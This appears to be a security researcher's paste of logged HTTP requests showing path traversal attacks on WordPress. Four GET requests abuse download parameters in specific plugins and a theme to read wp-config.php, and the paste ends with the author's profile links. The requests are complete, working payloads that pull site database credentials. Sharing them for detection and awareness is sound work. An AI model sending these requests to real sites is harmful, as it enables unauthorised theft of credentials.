Wordpress file traversal attacks

1. Wordpress file traversal attacks
2. ***********
3.  
4. GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
5. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
6. Content-Type: application/x-www-form-urlencoded
7. Accept: */*
8. Host: www.mywebsite.com
9. Accept-Encoding: gzip, deflate
10. Connection: Keep-Alive
11.  
12.  
13. GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
14. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
15. Content-Type: application/x-www-form-urlencoded
16. Accept: */*
17. Host: www.mywebsite.com
18. Accept-Encoding: gzip, deflate
19. Connection: Keep-Alive
20.  
21. GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
22. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
23. Content-Type: application/x-www-form-urlencoded
24. Accept: */*
25. Host: www.mywebsite.com
26. Accept-Encoding: gzip, deflate
27. Connection: Keep-Alive
28.  
29. GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
30. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
31. Content-Type: application/x-www-form-urlencoded
32. Accept: */*
33. Host: www.mywebsite.com
34. Accept-Encoding: gzip, deflate
35. Connection: Keep-Alive
36.  
37.  
38. *******
39. More FROM @neonprimetime security
40.  
41. http://pastebin.com/u/Neonprimetime
42. https://www.virustotal.com/en/USER/neonprimetime/
43. https://twitter.com/neonprimetime
44. https://www.reddit.com/USER/neonprimetime